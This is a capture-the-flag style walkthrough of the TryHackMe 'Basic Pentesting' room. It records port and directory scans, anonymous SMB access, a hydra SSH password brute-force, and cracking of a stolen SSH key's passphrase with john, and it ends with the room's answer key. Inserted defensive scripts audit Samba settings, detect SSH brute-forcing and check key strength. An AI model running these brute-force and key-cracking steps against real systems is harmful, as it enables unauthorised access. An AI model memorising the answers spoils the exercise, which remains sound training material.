Tryhackme-easy-Basic Pentesting

August 14, 2024

Daily practice

Basic Pentesting

Web App Testing and Privilege Escalation

Start with information gathering: check which ports are open, then look for directories.

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sV -sC -T4 10.10.233.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 07:01 EDT
Nmap scan report for 10.10.233.69
Host is up (0.27s latency).
Not shown: 955 closed tcp ports (conn-refused), 39 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2024-03-11T07:02:44-04:00
| smb2-time: 
|   date: 2024-03-11T11:02:44
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.19 seconds

During the scan dirsearch kept crashing (probably a network issue), but it still managed to turn up one unusual directory.

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u 10.10.233.69 

  _|. _ _  _  _  _ _|_    v0.4.3 
 (_||| _) (/_(_|| (_| )                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/桌面/reports/_10.10.233.69/_24-03-11_06-57-34.txt

Target: http://10.10.233.69/

[06:57:34] Starting:                                                                                
[06:57:50] 403 -  298B  - /.ht_wsr.txt                                  
[06:57:50] 403 -  301B  - /.htaccess.bak1                               
[06:57:50] 403 -  301B  - /.htaccess.orig
[06:57:51] 403 -  302B  - /.htaccess_extra                              
[06:57:51] 403 -  303B  - /.htaccess.sample
[06:57:51] 403 -  301B  - /.htaccess_orig
[06:57:51] 403 -  299B  - /.htaccessBAK
[06:57:51] 403 -  299B  - /.htaccess_sc
[06:57:51] 403 -  292B  - /.html
[06:57:51] 403 -  301B  - /.htaccess.save                               
[06:57:51] 403 -  298B  - /.httr-oauth                                  
[06:57:51] 403 -  297B  - /.htpasswds
[06:57:51] 403 -  301B  - /.htpasswd_test                               
[06:57:51] 403 -  300B  - /.htaccessOLD2                                
[06:57:51] 403 -  291B  - /.htm
[06:57:52] 403 -  299B  - /.htaccessOLD
[06:58:48] 200 -  476B  - /development/

Submitting that hidden directory as the answer was correct.

Visiting the development directory reveals two files.

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

While reading around I came across the SMB enumeration tool enum4linux, but after several attempts it still failed to enumerate any users.

Strangely, the results differed on every scan; most likely that was the network again.

It was indeed: switching to a European node made things much faster, so the problem was on my end.

[+] Attempting to map shares on 10.10.233.69                                                        
//10.10.233.69/Anonymous        Mapping: OK Listing: OK Writing: N/A

This line already shows that anonymous login is available. It should also have been possible to enumerate the needed username directly, though I don't know why it didn't.
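Seen from the blue-team side, the two findings so far (a share that anonymous users can list, and the nmap host scripts reporting a guest session with message signing not required) both trace back to smb.conf. Below is an added checker, not part of this write-up or of the room, that parses a constructed smb.conf and flags guest-accessible shares, writable guest shares, failed logins mapped to the guest account, and signing that is not mandatory. The configuration text is made up for the example; the option names are real Samba ones.

```python
import configparser
import io

# Constructed smb.conf for illustration; it is not the room's real configuration.
# It reproduces the kind of setup behind the findings above: a guest-accessible
# share, failed logins mapped to guest, and no requirement for message signing.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba Server
   map to guest = Bad User
   server signing = auto

[Anonymous]
   path = /samba/anonymous
   browsable = yes
   guest ok = yes
   read only = yes

[staff]
   path = /samba/staff
   valid users = @staff
   guest ok = no
   writable = yes
"""

TRUE_VALUES = {"yes", "true", "1"}


def _flag(section, key, default="no"):
    """Interpret a Samba boolean option (yes/no, true/false, 1/0)."""
    return section.get(key, default).strip().lower() in TRUE_VALUES


def _share_writable(section):
    """Shares are read-only by default; 'writable', 'writeable' and 'write ok'
    are synonyms for 'read only = no'."""
    for key in ("writable", "writeable", "write ok"):
        if key in section:
            return _flag(section, key)
    return not _flag(section, "read only", "yes")


def audit_smb_conf(text):
    """Return a list of (section, finding) tuples for risky Samba settings."""
    cp = configparser.ConfigParser(
        strict=False, interpolation=None, allow_no_value=True,
        empty_lines_in_values=False,
    )
    cp.read_file(io.StringIO(text))
    findings = []

    if cp.has_section("global"):
        glob = cp["global"]
        signing = glob.get("server signing", "default").strip().lower()
        if signing != "mandatory":
            findings.append(("global", f"server signing = {signing}; signing is not required"))
        if glob.get("map to guest", "never").strip().lower() != "never":
            findings.append(("global", "map to guest turns failed logins into guest sessions"))

    for name in cp.sections():
        if name.lower() == "global":
            continue
        sec = cp[name]
        # 'public' is a synonym for 'guest ok'
        if _flag(sec, "guest ok") or _flag(sec, "public"):
            findings.append((name, "guest ok = yes: anonymous users can list this share"))
            if _share_writable(sec):
                findings.append((name, "guest share is writable: anonymous users can upload"))
    return findings


if __name__ == "__main__":
    for section, finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{section}] {finding}")
```

Run against a real server with `audit_smb_conf(open("/etc/samba/smb.conf").read())`; the fix for the sample is `server signing = mandatory`, `map to guest = Never`, and `guest ok = no` on the share, after which the function returns an empty list.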

smbclient //10.10.233.69/anonymous

Logged in successfully and found staff.txt.

┌──(kali㉿kali)-[~/桌面]
└─$ cat staff.txt 
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

Then start brute-forcing the account password.

hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.82.249 ssh

A small problem came up: because of the network, brute-forcing from my side was almost useless, so this step had to be skipped for now.

armando
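The hydra run above is exactly the kind of activity a defender should be able to pick out of sshd's log. Here is an added detector, not from the original post, that runs over a few constructed syslog-style sshd lines (the source addresses, PIDs and timestamps are made up) and flags a source once it fails five logins within a minute, then flags any successful login from that source afterwards. The threshold, window and year are assumptions you would tune for your own hosts.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed syslog-style sshd lines (not captured from the room's machine):
# a burst of failures for "jan" from one source followed by a success, and a
# single unrelated failure from another source.
SAMPLE_AUTH_LOG = """\
Mar 11 07:10:01 basic2 sshd[2201]: Failed password for jan from 203.0.113.7 port 51102 ssh2
Mar 11 07:10:01 basic2 sshd[2203]: Failed password for jan from 203.0.113.7 port 51104 ssh2
Mar 11 07:10:02 basic2 sshd[2205]: Failed password for jan from 203.0.113.7 port 51106 ssh2
Mar 11 07:10:02 basic2 sshd[2207]: Failed password for invalid user admin from 203.0.113.7 port 51108 ssh2
Mar 11 07:10:03 basic2 sshd[2209]: Failed password for jan from 203.0.113.7 port 51110 ssh2
Mar 11 07:10:03 basic2 sshd[2211]: Failed password for jan from 203.0.113.7 port 51112 ssh2
Mar 11 07:10:04 basic2 sshd[2213]: Accepted password for jan from 203.0.113.7 port 51114 ssh2
Mar 11 07:15:30 basic2 sshd[2300]: Failed password for kay from 198.51.100.9 port 40012 ssh2
Mar 11 07:20:00 basic2 sshd[2310]: Accepted publickey for kay from 198.51.100.9 port 40020 ssh2
"""

# sshd's "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n>" lines
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_ts(ts, year):
    """Syslog timestamps carry no year, so the caller supplies one."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window_seconds=60, year=2024):
    """Flag a source IP once it has >= threshold failed logins inside
    window_seconds, and flag any later successful login from that source."""
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip = parse_ts(m["ts"], year), m["ip"]
        if m["result"] == "Failed":
            recent = failures[ip]
            recent.append(ts)
            # keep only failures inside the sliding window
            while (ts - recent[0]).total_seconds() > window_seconds:
                recent.pop(0)
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip,
                               "failures": len(recent), "time": ts})
        elif ip in flagged:
            # a success after a burst of failures is the event worth paging on
            alerts.append({"type": "success_after_bruteforce", "ip": ip,
                           "user": m["user"], "method": m["method"], "time": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

On a live host feed the function the contents of /var/log/auth.log (or `journalctl -u ssh` output reformatted to the same shape); the second alert type is the one that means the guessing actually worked.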

Log in to the account.

ssh jan@10.10.82.249

With a foothold obtained, start thinking about privilege escalation.

There is nothing of value in the current directory, but there is another user's home directory, kay; permissions are insufficient to read pass.bak.

Start enumerating to look for privilege-escalation leads.

jan@basic2:/home/kay$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .lesshst  .nano  pass.bak  .profile  .ssh  .sudo_as_admin_successful  .viminfo

There is a .ssh directory.

jan@basic2:/home/kay$ ls -la ./.ssh
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

There is an RSA key file. Copy it, save it to a local file, and try to crack it.

┌──(kali㉿kali)-[~/桌面]
└─$ vim idrsa   
                                                                                                    
┌──(kali㉿kali)-[~/桌面]
└─$ ssh2john idrsa > idrsahash
                                                                                                    
┌──(kali㉿kali)-[~/桌面]
└─$ john idrsahash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (idrsa)   
1g 0:00:00:00 DONE (2024-03-12 04:54) 50.00g/s 4137Kp/s 4137Kc/s 4137KC/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The passphrase was cracked successfully.
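Two things made this step cheap: the key was world-readable (-rw-r--r--), and john reported KDF cost 0, meaning legacy PEM encryption where the cipher key is a single MD5 pass over the passphrase, so rockyou went through at millions of guesses per second. The added script below, not part of this write-up, classifies a private key file (legacy PEM versus the newer OpenSSH format, and for the latter the bcrypt round count) and reports a too-permissive file mode. The key files it is fed are constructed headers with no key material; the ssh-keygen flags named in the messages are real.

```python
import base64
import os
import re
import struct

# Matches the PEM armor of any private key type (RSA, EC, DSA, OPENSSH).
PEM_RE = re.compile(
    r"-----BEGIN ([A-Z ]+) PRIVATE KEY-----\s*(.*?)-----END \1 PRIVATE KEY-----", re.S
)
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def ssh_string(data):
    """Encode bytes as an SSH 'string' (uint32 big-endian length + bytes)."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf, off):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(text):
    """Describe how (and whether) a private key file is passphrase-protected."""
    m = PEM_RE.search(text)
    if not m:
        return {"format": "unknown", "encrypted": None, "kdf": None, "rounds": None}
    label, body = m.group(1), m.group(2)
    if label == "OPENSSH":
        raw = base64.b64decode("".join(body.split()))
        if not raw.startswith(OPENSSH_MAGIC):
            return {"format": "openssh", "encrypted": None, "kdf": None, "rounds": None}
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(raw, off)    # b"none" when unencrypted
        kdf, off = _read_string(raw, off)       # b"none" or b"bcrypt"
        kdfopts, off = _read_string(raw, off)   # bcrypt: string salt + uint32 rounds
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh", "encrypted": cipher != b"none",
                "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM (BEGIN RSA/EC/DSA PRIVATE KEY): encryption is announced by a
    # Proc-Type header, and the cipher key is one MD5 pass over the passphrase,
    # which is what john reports above as KDF cost 0.
    encrypted = "Proc-Type: 4,ENCRYPTED" in body
    return {"format": "pem", "encrypted": encrypted,
            "kdf": "md5" if encrypted else None, "rounds": 1 if encrypted else None}


def key_findings(info, mode=None):
    """List why a key like this is cheap to steal or crack; empty means fine."""
    out = []
    if info["encrypted"] is False:
        out.append("key has no passphrase")
    elif info["format"] == "pem" and info["encrypted"]:
        out.append("legacy PEM encryption (MD5 KDF, 1 iteration) is cheap to brute-force;"
                   " re-encrypt with ssh-keygen -p -o -a 100")
    elif info["format"] == "openssh" and info["rounds"] is not None and info["rounds"] < 16:
        out.append(f"bcrypt rounds = {info['rounds']} is below the ssh-keygen default of 16")
    if mode is not None and mode & 0o077:
        out.append(f"mode {oct(mode & 0o777)} is readable by group/others; should be 0600")
    return out


def audit_key_file(path):
    """Run both checks against a real file on disk."""
    with open(path) as fh:
        info = classify_private_key(fh.read())
    return key_findings(info, os.stat(path).st_mode)


# --- constructed samples (header only, no key material) --------------------

def make_openssh_key_text(cipher, kdf, kdfoptions):
    """Build just the OpenSSH header (magic, cipher, kdf, kdfoptions, key count)
    in PEM armor; enough to exercise the parser."""
    raw = OPENSSH_MAGIC + ssh_string(cipher) + ssh_string(kdf) + ssh_string(kdfoptions)
    raw += struct.pack(">I", 1)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(raw).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def bcrypt_kdfoptions(rounds, salt=b"\x00" * 16):
    return ssh_string(salt) + struct.pack(">I", rounds)


LEGACY_ENCRYPTED_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n"
    "\n"
    "AAAA\n"
    "-----END RSA PRIVATE KEY-----\n"
)

if __name__ == "__main__":
    print(key_findings(classify_private_key(LEGACY_ENCRYPTED_PEM), 0o644))
    print(key_findings(classify_private_key(
        make_openssh_key_text(b"aes256-ctr", b"bcrypt", bcrypt_kdfoptions(100))), 0o600))
```

`audit_key_file("/home/kay/.ssh/id_rsa")` is the call for a real key; for the key in this room it would report both the legacy KDF and the 0644 mode. The general remedy is `chmod 600` plus `ssh-keygen -p -o -a 100 -f id_rsa`, which rewrites the key in the OpenSSH format with a bcrypt KDF that costs orders of magnitude more per guess than a single MD5.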

ssh -i id_rsa kay@10.10.82.249

Then read the file.

cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Answer

  1. Deploy the machine and connect to our network
  2. Find the services exposed by the machine
  3. What is the name of the hidden directory on the web server (enter name without /)?
     development
  4. User brute-forcing to find the username & password
  5. What is the username?
     Jan
  6. What is the password?
     armando
  7. What service do you use to access the server (answer in abbreviation in all caps)?
     ssh
  8. Enumerate the machine to find any vectors for privilege escalation
  9. What is the name of the other user you found (all lower case)?
     kay
  10. If you have found another user, what can you do with this information?
  11. What is the final password you obtain?
      heresareallystrongpasswordthatfollowsthepasswordpolicy$$